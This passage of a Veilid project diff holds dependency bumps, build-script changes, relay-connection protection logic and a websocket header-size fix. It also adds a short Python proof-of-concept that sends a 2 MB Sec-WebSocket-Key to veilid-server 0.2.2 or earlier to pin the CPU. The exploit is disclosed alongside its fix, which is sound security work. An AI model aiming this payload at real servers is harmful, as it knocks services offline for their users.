echo capnproto compiler ^(capnp^) is required but it's not installed. Install capnp 1.0.1 or higher. Ensure it is in your path. Aborting.
|
||||
echo capnp is available here: https://capnproto.org/capnproto-c++-win32-1.0.1.zip
|
||||
goto end
|
||||
)
|
||||
|
||||
|
7
doc/security/poc/large-websocket-key-v0.2.2.py
Normal file
7
doc/security/poc/large-websocket-key-v0.2.2.py
Normal file
@ -0,0 +1,7 @@
|
||||
# When pointed at veilid-server 0.2.2 or earlier, this will cause 100% CPU utilization
|
||||
|
||||
import socket
|
||||
s = socket.socket()
|
||||
s.connect(('127.0.0.1',5150))
|
||||
s.send(f"GET /ws HTTP/1.1\r\nSec-WebSocket-Version: 13\r\nConnection: Upgrade\r\nUpgrade: websocket\r\nSec-WebSocket-Key: {'A'*2000000}\r\n\r\n".encode())
|
||||
s.close()
|
@ -10,4 +10,4 @@ cp -rf /veilid/package/rpm/veilid-server/veilid-server.spec /root/rpmbuild/SPECS
|
||||
/veilid/package/replace_variable.sh /root/rpmbuild/SPECS/veilid-server.spec CARGO_ARCH $CARGO_ARCH
|
||||
|
||||
# build the rpm
|
||||
rpmbuild --target "x86_64" -bb /root/rpmbuild/SPECS/veilid-server.spec
|
||||
rpmbuild --target "$ARCH" -bb /root/rpmbuild/SPECS/veilid-server.spec
|
@ -1,9 +1,16 @@
|
||||
#!/bin/bash
|
||||
SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
|
||||
if [ -f ".capnp_version" ]; then
|
||||
CAPNPROTO_VERSION=$(cat ".capnp_version")
|
||||
else
|
||||
CAPNPROTO_VERSION=$(cat "$SCRIPTDIR/../../.capnp_version")
|
||||
fi
|
||||
|
||||
mkdir /tmp/capnproto-install
|
||||
pushd /tmp/capnproto-install
|
||||
curl -O https://capnproto.org/capnproto-c++-0.10.4.tar.gz
|
||||
tar zxf capnproto-c++-0.10.4.tar.gz
|
||||
cd capnproto-c++-0.10.4
|
||||
curl -O https://capnproto.org/capnproto-c++-${CAPNPROTO_VERSION}.tar.gz
|
||||
tar zxf capnproto-c++-${CAPNPROTO_VERSION}.tar.gz
|
||||
cd capnproto-c++-${CAPNPROTO_VERSION}
|
||||
./configure --without-openssl
|
||||
make -j$1 check
|
||||
if [ "$EUID" -ne 0 ]; then
|
||||
|
@ -1,13 +1,28 @@
|
||||
#!/bin/bash
|
||||
VERSION=23.3
|
||||
SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
|
||||
if [ -f ".protoc_version" ]; then
|
||||
PROTOC_VERSION=$(cat ".protoc_version")
|
||||
else
|
||||
PROTOC_VERSION=$(cat "$SCRIPTDIR/../../.protoc_version")
|
||||
fi
|
||||
|
||||
UNAME_M=$(uname -m)
|
||||
if [[ "$UNAME_M" == "x86_64" ]]; then
|
||||
PROTOC_ARCH=x86_64
|
||||
elif [[ "$UNAME_M" == "aarch64" ]]; then
|
||||
PROTOC_ARCH=aarch_64
|
||||
else
|
||||
echo Unsupported build architecture
|
||||
exit 1
|
||||
fi
|
||||
|
||||
mkdir /tmp/protoc-install
|
||||
pushd /tmp/protoc-install
|
||||
curl -OL https://github.com/protocolbuffers/protobuf/releases/download/v$VERSION/protoc-$VERSION-linux-x86_64.zip
|
||||
unzip protoc-$VERSION-linux-x86_64.zip
|
||||
curl -OL https://github.com/protocolbuffers/protobuf/releases/download/v$PROTOC_VERSION/protoc-$PROTOC_VERSION-linux-$PROTOC_ARCH.zip
|
||||
unzip protoc-$PROTOC_VERSION-linux-$PROTOC_ARCH.zip
|
||||
if [ "$EUID" -ne 0 ]; then
|
||||
if command -v checkinstall &> /dev/null; then
|
||||
sudo checkinstall --pkgversion=$VERSION -y cp -r bin include /usr/local/
|
||||
sudo checkinstall --pkgversion=$PROTOC_VERSION -y cp -r bin include /usr/local/
|
||||
cp *.deb ~
|
||||
else
|
||||
sudo cp -r bin include /usr/local/
|
||||
@ -16,7 +31,7 @@ if [ "$EUID" -ne 0 ]; then
|
||||
sudo rm -rf /tmp/protoc-install
|
||||
else
|
||||
if command -v checkinstall &> /dev/null; then
|
||||
checkinstall --pkgversion=$VERSION -y cp -r bin include /usr/local/
|
||||
checkinstall --pkgversion=$PROTOC_VERSION -y cp -r bin include /usr/local/
|
||||
cp *.deb ~
|
||||
else
|
||||
cp -r bin include /usr/local/
|
||||
|
@ -1,7 +1,7 @@
|
||||
[package]
|
||||
# --- Bumpversion match - do not reorder
|
||||
name = "veilid-cli"
|
||||
version = "0.2.1"
|
||||
version = "0.2.3"
|
||||
# ---
|
||||
authors = ["Veilid Team <contact@veilid.com>"]
|
||||
edition = "2021"
|
||||
@ -21,13 +21,13 @@ rt-async-std = [
|
||||
rt-tokio = ["tokio", "tokio-util", "veilid-tools/rt-tokio", "cursive/rt-tokio"]
|
||||
|
||||
[dependencies]
|
||||
async-std = { version = "^1.9", features = [
|
||||
async-std = { version = "^1.12", features = [
|
||||
"unstable",
|
||||
"attributes",
|
||||
], optional = true }
|
||||
tokio = { version = "^1", features = ["full"], optional = true }
|
||||
tokio-util = { version = "^0", features = ["compat"], optional = true }
|
||||
async-tungstenite = { version = "^0.8" }
|
||||
async-tungstenite = { version = "^0.23" }
|
||||
cursive = { git = "https://gitlab.com/veilid/cursive.git", default-features = false, features = [
|
||||
"crossterm",
|
||||
"toml",
|
||||
@ -38,10 +38,10 @@ cursive_buffered_backend = { git = "https://gitlab.com/veilid/cursive-buffered-b
|
||||
# cursive-multiplex = "0.6.0"
|
||||
# cursive_tree_view = "0.6.0"
|
||||
cursive_table_view = "0.14.0"
|
||||
arboard = "3.2.0"
|
||||
arboard = "3.2.1"
|
||||
# cursive-tabs = "0.5.0"
|
||||
clap = { version = "4", features = ["derive"] }
|
||||
directories = "^4"
|
||||
directories = "^5"
|
||||
log = "^0"
|
||||
futures = "^0"
|
||||
serde = "^1"
|
||||
@ -54,7 +54,7 @@ flexi_logger = { version = "^0", features = ["use_chrono_for_offset"] }
|
||||
thiserror = "^1"
|
||||
crossbeam-channel = "^0"
|
||||
hex = "^0"
|
||||
veilid-tools = { version = "0.2.0", path = "../veilid-tools" }
|
||||
veilid-tools = { version = "0.2.3", path = "../veilid-tools" }
|
||||
|
||||
json = "^0"
|
||||
stop-token = { version = "^0", default-features = false }
|
||||
@ -63,4 +63,4 @@ data-encoding = { version = "^2" }
|
||||
indent = { version = "0.1.1" }
|
||||
|
||||
[dev-dependencies]
|
||||
serial_test = "^0"
|
||||
serial_test = "^2"
|
||||
|
@ -1,7 +1,7 @@
|
||||
[package]
|
||||
# --- Bumpversion match - do not reorder
|
||||
name = "veilid-core"
|
||||
version = "0.2.1"
|
||||
version = "0.2.3"
|
||||
# ---
|
||||
description = "Core library used to create a Veilid node and operate it as part of an application"
|
||||
authors = ["Veilid Team <contact@veilid.com>"]
|
||||
@ -59,14 +59,14 @@ network-result-extra = ["veilid-tools/network-result-extra"]
|
||||
[dependencies]
|
||||
|
||||
# Tools
|
||||
veilid-tools = { version = "0.2.0", path = "../veilid-tools", features = [
|
||||
veilid-tools = { version = "0.2.3", path = "../veilid-tools", features = [
|
||||
"tracing",
|
||||
], default-features = false }
|
||||
paste = "1.0.14"
|
||||
once_cell = "1.18.0"
|
||||
owning_ref = "0.4.1"
|
||||
backtrace = "0.3.68"
|
||||
num-traits = "0.2.15"
|
||||
backtrace = "0.3.69"
|
||||
num-traits = "0.2.16"
|
||||
shell-words = "1.1.0"
|
||||
static_assertions = "1.1.0"
|
||||
cfg-if = "1.0.0"
|
||||
@ -79,20 +79,19 @@ tracing = { version = "0.1.37", features = ["log", "attributes"] }
|
||||
tracing-subscriber = "0.3.17"
|
||||
tracing-error = "0.2.0"
|
||||
eyre = "0.6.8"
|
||||
thiserror = "1.0.47"
|
||||
thiserror = "1.0.48"
|
||||
|
||||
# Data structures
|
||||
enumset = { version = "1.1.2", features = ["serde"] }
|
||||
keyvaluedb = "0.1.0"
|
||||
range-set-blaze = "0.1.9"
|
||||
weak-table = "0.3.2"
|
||||
generic-array = "0.14.7"
|
||||
hashlink = { package = "veilid-hashlink", version = "0.1.0", features = [
|
||||
"serde_impl",
|
||||
] }
|
||||
|
||||
# System
|
||||
futures-util = { version = "0.3.28", default_features = false, features = [
|
||||
futures-util = { version = "0.3.28", default-features = false, features = [
|
||||
"alloc",
|
||||
] }
|
||||
flume = { version = "0.11.0", features = ["async"] }
|
||||
@ -101,19 +100,19 @@ lock_api = "0.4.10"
|
||||
stop-token = { version = "0.7.0", default-features = false }
|
||||
|
||||
# Crypto
|
||||
ed25519-dalek = { version = "2.0.0", default_features = false, features = [
|
||||
ed25519-dalek = { version = "2.0.0", default-features = false, features = [
|
||||
"alloc",
|
||||
"rand_core",
|
||||
"digest",
|
||||
"zeroize",
|
||||
] }
|
||||
x25519-dalek = { version = "2.0.0", default_features = false, features = [
|
||||
x25519-dalek = { version = "2.0.0", default-features = false, features = [
|
||||
"alloc",
|
||||
"static_secrets",
|
||||
"zeroize",
|
||||
"precomputed-tables",
|
||||
] }
|
||||
curve25519-dalek = { version = "4.0.0", default_features = false, features = [
|
||||
curve25519-dalek = { version = "4.1.0", default-features = false, features = [
|
||||
"alloc",
|
||||
"zeroize",
|
||||
"precomputed-tables",
|
||||
@ -121,21 +120,21 @@ curve25519-dalek = { version = "4.0.0", default_features = false, features = [
|
||||
blake3 = { version = "1.4.1" }
|
||||
chacha20poly1305 = "0.10.1"
|
||||
chacha20 = "0.9.1"
|
||||
argon2 = "0.5.1"
|
||||
argon2 = "0.5.2"
|
||||
|
||||
# Network
|
||||
async-std-resolver = { version = "0.22.0", optional = true }
|
||||
trust-dns-resolver = { version = "0.22.0", optional = true }
|
||||
enum-as-inner = "=0.5.1" # temporary fix for trust-dns-resolver v0.22.0
|
||||
async-std-resolver = { version = "0.23.0", optional = true }
|
||||
trust-dns-resolver = { version = "0.23.0", optional = true }
|
||||
enum-as-inner = "=0.6.0" # temporary fix for trust-dns-resolver v0.22.0
|
||||
|
||||
# Serialization
|
||||
capnp = { version = "0.17.2", default_features = false }
|
||||
serde = { version = "1.0.183", features = ["derive"] }
|
||||
serde_json = { version = "1.0.105" }
|
||||
capnp = { version = "0.18.1", default-features = false, features = [ "alloc" ] }
|
||||
serde = { version = "1.0.188", features = ["derive"] }
|
||||
serde_json = { version = "1.0.107" }
|
||||
serde-big-array = "0.5.1"
|
||||
json = "0.12.4"
|
||||
data-encoding = { version = "2.4.0" }
|
||||
schemars = "0.8.12"
|
||||
schemars = "0.8.13"
|
||||
lz4_flex = { version = "0.11.1", default-features = false, features = [
|
||||
"safe-encode",
|
||||
"safe-decode",
|
||||
@ -148,9 +147,9 @@ lz4_flex = { version = "0.11.1", default-features = false, features = [
|
||||
# Tools
|
||||
config = { version = "0.13.3", features = ["yaml"] }
|
||||
bugsalot = { package = "veilid-bugsalot", version = "0.1.0" }
|
||||
chrono = "0.4.26"
|
||||
libc = "0.2.147"
|
||||
nix = "0.26.2"
|
||||
chrono = "0.4.31"
|
||||
libc = "0.2.148"
|
||||
nix = "0.27.1"
|
||||
|
||||
# System
|
||||
async-std = { version = "1.12.0", features = ["unstable"], optional = true }
|
||||
@ -170,24 +169,24 @@ keyring-manager = "0.5.0"
|
||||
keyvaluedb-sqlite = "0.1.0"
|
||||
|
||||
# Network
|
||||
async-tungstenite = { version = "0.23.0", features = ["async-tls"] }
|
||||
async-tungstenite = { version = "0.23.0", features = [ "async-tls" ] }
|
||||
igd = { package = "veilid-igd", version = "0.1.0" }
|
||||
async-tls = "0.12.0"
|
||||
webpki = "0.22.0"
|
||||
webpki = "0.22.1"
|
||||
webpki-roots = "0.25.2"
|
||||
rustls = "0.20.8"
|
||||
rustls = "=0.20.9"
|
||||
rustls-pemfile = "1.0.3"
|
||||
socket2 = { version = "0.5.3", features = ["all"] }
|
||||
socket2 = { version = "0.5.4", features = ["all"] }
|
||||
|
||||
# Dependencies for WASM builds only
|
||||
[target.'cfg(target_arch = "wasm32")'.dependencies]
|
||||
|
||||
veilid-tools = { version = "0.2.0", path = "../veilid-tools", default-features = false, features = [
|
||||
veilid-tools = { version = "0.2.3", path = "../veilid-tools", default-features = false, features = [
|
||||
"rt-wasm-bindgen",
|
||||
] }
|
||||
|
||||
# Tools
|
||||
getrandom = { version = "0.2.4", features = ["js"] }
|
||||
getrandom = { version = "0.2.10", features = ["js"] }
|
||||
|
||||
# System
|
||||
async_executors = { version = "0.7.0", default-features = false, features = [
|
||||
@ -200,7 +199,7 @@ js-sys = "0.3.64"
|
||||
wasm-bindgen-futures = "0.4.37"
|
||||
send_wrapper = { version = "0.6.0", features = ["futures"] }
|
||||
tsify = { version = "0.4.5", features = ["js"] }
|
||||
serde-wasm-bindgen = "0.5.0"
|
||||
serde-wasm-bindgen = "0.6.0"
|
||||
|
||||
# Network
|
||||
ws_stream_wasm = "0.7.4"
|
||||
@ -242,9 +241,9 @@ ifstructs = "0.1.1"
|
||||
|
||||
# Dependencies for Linux or Android
|
||||
[target.'cfg(any(target_os = "android", target_os = "linux"))'.dependencies]
|
||||
rtnetlink = { version = "=0.13.0", default-features = false }
|
||||
rtnetlink = { version = "=0.13.1", default-features = false }
|
||||
netlink-sys = { version = "=0.8.5" }
|
||||
netlink-packet-route = { version = "=0.17.0" }
|
||||
netlink-packet-route = { version = "=0.17.1" }
|
||||
|
||||
# Dependencies for Windows
|
||||
[target.'cfg(target_os = "windows")'.dependencies]
|
||||
@ -282,7 +281,7 @@ wasm-logger = "0.2.0"
|
||||
### BUILD OPTIONS
|
||||
|
||||
[build-dependencies]
|
||||
capnpc = "0.17.2"
|
||||
capnpc = "0.18.0"
|
||||
|
||||
[package.metadata.wasm-pack.profile.release]
|
||||
wasm-opt = ["-O", "--enable-mutable-globals"]
|
||||
|
@ -1,4 +1,119 @@
|
||||
use std::path::PathBuf;
|
||||
use std::process::{Command, Stdio};
|
||||
|
||||
fn search_file<T: AsRef<str>, P: AsRef<str>>(start: T, name: P) -> Option<PathBuf> {
|
||||
let start_path = PathBuf::from(start.as_ref()).canonicalize().ok();
|
||||
let mut path = start_path.as_ref().map(|x| x.as_path());
|
||||
while let Some(some_path) = path {
|
||||
let file_path = some_path.join(name.as_ref());
|
||||
if file_path.exists() {
|
||||
return Some(file_path.to_owned());
|
||||
}
|
||||
path = some_path.parent();
|
||||
}
|
||||
None
|
||||
}
|
||||
|
||||
fn get_desired_capnp_version_string() -> String {
|
||||
let capnp_path = search_file(env!("CARGO_MANIFEST_DIR"), ".capnp_version")
|
||||
.expect("should find .capnp_version file");
|
||||
std::fs::read_to_string(&capnp_path)
|
||||
.expect(&format!(
|
||||
"can't read .capnp_version file here: {:?}",
|
||||
capnp_path
|
||||
))
|
||||
.trim()
|
||||
.to_owned()
|
||||
}
|
||||
|
||||
fn get_capnp_version_string() -> String {
|
||||
let output = Command::new("capnp")
|
||||
.arg("--version")
|
||||
.stdout(Stdio::piped())
|
||||
.output()
|
||||
.expect("capnp was not in the PATH");
|
||||
let s = String::from_utf8(output.stdout)
|
||||
.expect("'capnp --version' output was not a valid string")
|
||||
.trim()
|
||||
.to_owned();
|
||||
|
||||
if !s.starts_with("Cap'n Proto version ") {
|
||||
panic!("invalid capnp version string: {}", s);
|
||||
}
|
||||
s[20..].to_owned()
|
||||
}
|
||||
|
||||
fn get_desired_protoc_version_string() -> String {
|
||||
let protoc_path = search_file(env!("CARGO_MANIFEST_DIR"), ".protoc_version")
|
||||
.expect("should find .protoc_version file");
|
||||
std::fs::read_to_string(&protoc_path)
|
||||
.expect(&format!(
|
||||
"can't read .protoc_version file here: {:?}",
|
||||
protoc_path
|
||||
))
|
||||
.trim()
|
||||
.to_owned()
|
||||
}
|
||||
|
||||
fn get_protoc_version_string() -> String {
|
||||
let output = Command::new("protoc")
|
||||
.arg("--version")
|
||||
.stdout(Stdio::piped())
|
||||
.output()
|
||||
.expect("protoc was not in the PATH");
|
||||
let s = String::from_utf8(output.stdout)
|
||||
.expect("'protoc --version' output was not a valid string")
|
||||
.trim()
|
||||
.to_owned();
|
||||
|
||||
if !s.starts_with("libprotoc ") {
|
||||
panic!("invalid protoc version string: {}", s);
|
||||
}
|
||||
s[10..].to_owned()
|
||||
}
|
||||
|
||||
fn main() {
|
||||
let desired_capnp_version_string = get_desired_capnp_version_string();
|
||||
let capnp_version_string = get_capnp_version_string();
|
||||
let desired_protoc_version_string = get_desired_protoc_version_string();
|
||||
let protoc_version_string = get_protoc_version_string();
|
||||
|
||||
// Check capnp version
|
||||
let desired_capnp_major_version =
|
||||
usize::from_str_radix(desired_capnp_version_string.split_once(".").unwrap().0, 10)
|
||||
.expect("should be valid int");
|
||||
|
||||
if usize::from_str_radix(capnp_version_string.split_once(".").unwrap().0, 10)
|
||||
.expect("should be valid int")
|
||||
!= desired_capnp_major_version
|
||||
{
|
||||
panic!(
|
||||
"capnproto version should be major version 1, preferably {} but is {}",
|
||||
desired_capnp_version_string, capnp_version_string
|
||||
);
|
||||
} else if capnp_version_string != desired_capnp_version_string {
|
||||
println!(
|
||||
"capnproto version may be untested: {}",
|
||||
capnp_version_string
|
||||
);
|
||||
}
|
||||
|
||||
// Check protoc version
|
||||
let desired_protoc_major_version =
|
||||
usize::from_str_radix(desired_protoc_version_string.split_once(".").unwrap().0, 10)
|
||||
.expect("should be valid int");
|
||||
if usize::from_str_radix(protoc_version_string.split_once(".").unwrap().0, 10)
|
||||
.expect("should be valid int")
|
||||
< desired_protoc_major_version
|
||||
{
|
||||
panic!(
|
||||
"protoc version should be at least major version {} but is {}",
|
||||
desired_protoc_major_version, protoc_version_string
|
||||
);
|
||||
} else if protoc_version_string != desired_protoc_version_string {
|
||||
println!("protoc version may be untested: {}", protoc_version_string);
|
||||
}
|
||||
|
||||
::capnpc::CompilerCommand::new()
|
||||
.file("proto/veilid.capnp")
|
||||
.run()
|
||||
|
@ -1,8 +1,7 @@
|
||||
use curve25519_dalek::digest::generic_array::typenum::U64;
|
||||
use curve25519_dalek::digest::generic_array::{typenum::U64, GenericArray};
|
||||
use curve25519_dalek::digest::{
|
||||
Digest, FixedOutput, FixedOutputReset, Output, OutputSizeUser, Reset, Update,
|
||||
};
|
||||
use generic_array::GenericArray;
|
||||
|
||||
pub struct Blake3Digest512 {
|
||||
dig: blake3::Hasher,
|
||||
|
@ -1,7 +1,6 @@
|
||||
use super::*;
|
||||
|
||||
#[derive(Clone, Copy, Debug, PartialEq, Eq, Hash)]
|
||||
#[cfg_attr(target_arch = "wasm32", derive(Tsify), tsify(into_wasm_abi))]
|
||||
pub struct CryptoTyped<K>
|
||||
where
|
||||
K: Clone
|
||||
|
@ -1,9 +1,7 @@
|
||||
use super::*;
|
||||
|
||||
#[derive(Clone, Debug, Serialize, Deserialize, PartialOrd, Ord, PartialEq, Eq, Hash, Default)]
|
||||
#[cfg_attr(target_arch = "wasm32", derive(Tsify))]
|
||||
#[serde(from = "Vec<CryptoTyped<K>>", into = "Vec<CryptoTyped<K>>")]
|
||||
// TODO: figure out hot to TS type this as `string`, since it's converted to string via the JSON API.
|
||||
pub struct CryptoTypedGroup<K = PublicKey>
|
||||
where
|
||||
K: Clone
|
||||
|
@ -7,9 +7,7 @@ use super::*;
|
||||
tsify(from_wasm_abi, into_wasm_abi)
|
||||
)]
|
||||
pub struct KeyPair {
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
pub key: PublicKey,
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
pub secret: SecretKey,
|
||||
}
|
||||
from_impl_to_jsvalue!(KeyPair);
|
||||
|
@ -25,7 +25,7 @@ cfg_if! {
|
||||
pub async fn resolver(
|
||||
config: config::ResolverConfig,
|
||||
options: config::ResolverOpts,
|
||||
) -> Result<AsyncResolver, ResolveError> {
|
||||
) -> AsyncResolver {
|
||||
AsyncResolver::tokio(config, options)
|
||||
}
|
||||
|
||||
@ -62,7 +62,6 @@ cfg_if! {
|
||||
config::ResolverOpts::default(),
|
||||
)
|
||||
.await
|
||||
.expect("failed to connect resolver"),
|
||||
};
|
||||
|
||||
*resolver_lock = Some(resolver.clone());
|
||||
|
@ -139,6 +139,33 @@ impl ConnectionManager {
|
||||
debug!("finished connection manager shutdown");
|
||||
}
|
||||
|
||||
// Internal routine to see if we should keep this connection
|
||||
// from being LRU removed. Used on our initiated relay connections.
|
||||
fn should_protect_connection(&self, conn: &NetworkConnection) -> bool {
|
||||
let netman = self.network_manager();
|
||||
let routing_table = netman.routing_table();
|
||||
let remote_address = conn.connection_descriptor().remote_address().address();
|
||||
let Some(routing_domain) = routing_table.routing_domain_for_address(remote_address) else {
|
||||
return false;
|
||||
};
|
||||
let Some(rn) = routing_table.relay_node(routing_domain) else {
|
||||
return false;
|
||||
};
|
||||
let relay_nr = rn.filtered_clone(
|
||||
NodeRefFilter::new()
|
||||
.with_routing_domain(routing_domain)
|
||||
.with_address_type(conn.connection_descriptor().address_type())
|
||||
.with_protocol_type(conn.connection_descriptor().protocol_type()),
|
||||
);
|
||||
let dids = relay_nr.all_filtered_dial_info_details();
|
||||
for did in dids {
|
||||
if did.dial_info.address() == remote_address {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
false
|
||||
}
|
||||
|
||||
// Internal routine to register new connection atomically.
|
||||
// Registers connection in the connection table for later access
|
||||
// and spawns a message processing loop for the connection
|
||||
@ -163,8 +190,16 @@ impl ConnectionManager {
|
||||
None => bail!("not creating connection because we are stopping"),
|
||||
};
|
||||
|
||||
let conn = NetworkConnection::from_protocol(self.clone(), stop_token, prot_conn, id);
|
||||
let mut conn = NetworkConnection::from_protocol(self.clone(), stop_token, prot_conn, id);
|
||||
let handle = conn.get_handle();
|
||||
|
||||
// See if this should be a protected connection
|
||||
let protect = self.should_protect_connection(&conn);
|
||||
if protect {
|
||||
log_net!(debug "== PROTECTING connection: {} -> {}", id, conn.debug_print(get_aligned_timestamp()));
|
||||
conn.protect();
|
||||
}
|
||||
|
||||
// Add to the connection table
|
||||
match self.arc.connection_table.add_connection(conn) {
|
||||
Ok(None) => {
|
||||
@ -173,7 +208,7 @@ impl ConnectionManager {
|
||||
Ok(Some(conn)) => {
|
||||
// Connection added and a different one LRU'd out
|
||||
// Send it to be terminated
|
||||
log_net!(debug "== LRU kill connection due to limit: {:?}", conn);
|
||||
// log_net!(debug "== LRU kill connection due to limit: {:?}", conn);
|
||||
let _ = inner.sender.send(ConnectionManagerEvent::Dead(conn));
|
||||
}
|
||||
Err(ConnectionTableAddError::AddressFilter(conn, e)) => {
|
||||
@ -404,4 +439,12 @@ impl ConnectionManager {
|
||||
let _ = sender.send_async(ConnectionManagerEvent::Dead(conn)).await;
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn debug_print(&self) -> String {
|
||||
//let inner = self.arc.inner.lock();
|
||||
format!(
|
||||
"Connection Table:\n\n{}",
|
||||
self.arc.connection_table.debug_print_table()
|
||||
)
|
||||
}
|
||||
}
|
||||
|
@ -72,6 +72,15 @@ impl ConnectionTable {
|
||||
}
|
||||
}
|
||||
|
||||
fn index_to_protocol(idx: usize) -> ProtocolType {
|
||||
match idx {
|
||||
0 => ProtocolType::TCP,
|
||||
1 => ProtocolType::WS,
|
||||
2 => ProtocolType::WSS,
|
||||
_ => panic!("not a connection-oriented protocol"),
|
||||
}
|
||||
}
|
||||
|
||||
#[instrument(level = "trace", skip(self))]
|
||||
pub async fn join(&self) {
|
||||
let mut unord = {
|
||||
@ -175,10 +184,20 @@ impl ConnectionTable {
|
||||
// then drop the least recently used connection
|
||||
let mut out_conn = None;
|
||||
if inner.conn_by_id[protocol_index].len() > inner.max_connections[protocol_index] {
|
||||
if let Some((lruk, lru_conn)) = inner.conn_by_id[protocol_index].peek_lru() {
|
||||
while let Some((lruk, lru_conn)) = inner.conn_by_id[protocol_index].peek_lru() {
|
||||
let lruk = *lruk;
|
||||
log_net!(debug "connection lru out: {:?}", lru_conn);
|
||||
|
||||
// Don't LRU protected connections
|
||||
if lru_conn.is_protected() {
|
||||
// Mark as recently used
|
||||
log_net!(debug "== No LRU Out for PROTECTED connection: {} -> {}", lruk, lru_conn.debug_print(get_aligned_timestamp()));
|
||||
inner.conn_by_id[protocol_index].get(&lruk);
|
||||
continue;
|
||||
}
|
||||
|
||||
log_net!(debug "== LRU Connection Killed: {} -> {}", lruk, lru_conn.debug_print(get_aligned_timestamp()));
|
||||
out_conn = Some(Self::remove_connection_records(&mut *inner, lruk));
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
@ -331,4 +350,23 @@ impl ConnectionTable {
|
||||
let conn = Self::remove_connection_records(&mut *inner, id);
|
||||
Some(conn)
|
||||
}
|
||||
|
||||
pub fn debug_print_table(&self) -> String {
|
||||
let mut out = String::new();
|
||||
let inner = self.inner.lock();
|
||||
let cur_ts = get_aligned_timestamp();
|
||||
for t in 0..inner.conn_by_id.len() {
|
||||
out += &format!(
|
||||
" {} Connections: ({}/{})\n",
|
||||
Self::index_to_protocol(t).to_string(),
|
||||
inner.conn_by_id[t].len(),
|
||||
inner.max_connections[t]
|
||||
);
|
||||
|
||||
for (_, conn) in &inner.conn_by_id[t] {
|
||||
out += &format!(" {}\n", conn.debug_print(cur_ts));
|
||||
}
|
||||
}
|
||||
out
|
||||
}
|
||||
}
|
||||
|
@ -665,7 +665,7 @@ impl NetworkManager {
|
||||
#[instrument(level = "trace", skip(self), err)]
|
||||
pub async fn handle_signal(
|
||||
&self,
|
||||
connection_descriptor: ConnectionDescriptor,
|
||||
signal_connection_descriptor: ConnectionDescriptor,
|
||||
signal_info: SignalInfo,
|
||||
) -> EyreResult<NetworkResult<()>> {
|
||||
match signal_info {
|
||||
@ -689,8 +689,9 @@ impl NetworkManager {
|
||||
};
|
||||
|
||||
// Restrict reverse connection to same protocol as inbound signal
|
||||
let peer_nr = peer_nr
|
||||
.filtered_clone(NodeRefFilter::from(connection_descriptor.protocol_type()));
|
||||
let peer_nr = peer_nr.filtered_clone(NodeRefFilter::from(
|
||||
signal_connection_descriptor.protocol_type(),
|
||||
));
|
||||
|
||||
// Make a reverse connection to the peer and send the receipt to it
|
||||
rpc.rpc_call_return_receipt(Destination::direct(peer_nr), receipt)
|
||||
|
@ -33,7 +33,7 @@ impl Network {
|
||||
let server_config = self
|
||||
.load_server_config()
|
||||
.wrap_err("Couldn't create TLS configuration")?;
|
||||
let acceptor = TlsAcceptor::from(Arc::new(server_config));
|
||||
let acceptor = TlsAcceptor::from(server_config);
|
||||
self.inner.lock().tls_acceptor = Some(acceptor.clone());
|
||||
Ok(acceptor)
|
||||
}
|
||||
|
@ -1,10 +1,22 @@
|
||||
use super::*;
|
||||
|
||||
use async_tls::TlsConnector;
|
||||
use async_tungstenite::tungstenite::handshake::server::{
|
||||
Callback, ErrorResponse, Request, Response,
|
||||
};
|
||||
use async_tungstenite::tungstenite::http::StatusCode;
|
||||
use async_tungstenite::tungstenite::protocol::Message;
|
||||
use async_tungstenite::{accept_async, client_async, WebSocketStream};
|
||||
use async_tungstenite::{accept_hdr_async, client_async, WebSocketStream};
|
||||
use futures_util::{AsyncRead, AsyncWrite, SinkExt};
|
||||
use sockets::*;
|
||||
|
||||
/// Maximum number of websocket request headers to permit
|
||||
const MAX_WS_HEADERS: usize = 24;
|
||||
/// Maximum size of any one specific websocket header
|
||||
const MAX_WS_HEADER_LENGTH: usize = 512;
|
||||
/// Maximum total size of headers and request including newlines
|
||||
const MAX_WS_BEFORE_BODY: usize = 2048;
|
||||
|
||||
cfg_if! {
|
||||
if #[cfg(feature="rt-async-std")] {
|
||||
pub type WebsocketNetworkConnectionWSS =
|
||||
@ -180,29 +192,57 @@ impl WebsocketProtocolHandler {
|
||||
log_net!("WS: on_accept_async: enter");
|
||||
let request_path_len = self.arc.request_path.len() + 2;
|
||||
|
||||
let mut peekbuf: Vec<u8> = vec![0u8; request_path_len];
|
||||
if let Err(_) = timeout(
|
||||
let mut peek_buf = [0u8; MAX_WS_BEFORE_BODY];
|
||||
let peek_len = match timeout(
|
||||
self.arc.connection_initial_timeout_ms,
|
||||
ps.peek_exact(&mut peekbuf),
|
||||
ps.peek(&mut peek_buf),
|
||||
)
|
||||
.await
|
||||
{
|
||||
Err(_) => {
|
||||
// Timeout
|
||||
return Ok(None);
|
||||
}
|
||||
Ok(Err(_)) => {
|
||||
// Peek error
|
||||
return Ok(None);
|
||||
}
|
||||
Ok(Ok(v)) => v,
|
||||
};
|
||||
|
||||
// If we can't peek at least our request path, then fail out
|
||||
if peek_len < request_path_len {
|
||||
return Ok(None);
|
||||
}
|
||||
|
||||
// Check for websocket path
|
||||
let matches_path = &peekbuf[0..request_path_len - 2] == self.arc.request_path.as_slice()
|
||||
&& (peekbuf[request_path_len - 2] == b' '
|
||||
|| (peekbuf[request_path_len - 2] == b'/'
|
||||
&& peekbuf[request_path_len - 1] == b' '));
|
||||
let matches_path = &peek_buf[0..request_path_len - 2] == self.arc.request_path.as_slice()
|
||||
&& (peek_buf[request_path_len - 2] == b' '
|
||||
|| (peek_buf[request_path_len - 2] == b'/'
|
||||
&& peek_buf[request_path_len - 1] == b' '));
|
||||
|
||||
if !matches_path {
|
||||
return Ok(None);
|
||||
}
|
||||
|
||||
let ws_stream = accept_async(ps)
|
||||
.await
|
||||
.map_err(|e| io_error_other!(format!("failed websockets handshake: {}", e)))?;
|
||||
// Check for double-CRLF indicating end of headers
|
||||
// if we don't find the end of the headers within MAX_WS_BEFORE_BODY
|
||||
// then we should bail, as this could be an attack or at best, something malformed
|
||||
// Yes, this restricts our handling to CRLF-conforming HTTP implementations
|
||||
// This check could be loosened if necessary, but until we have a reason to do so
|
||||
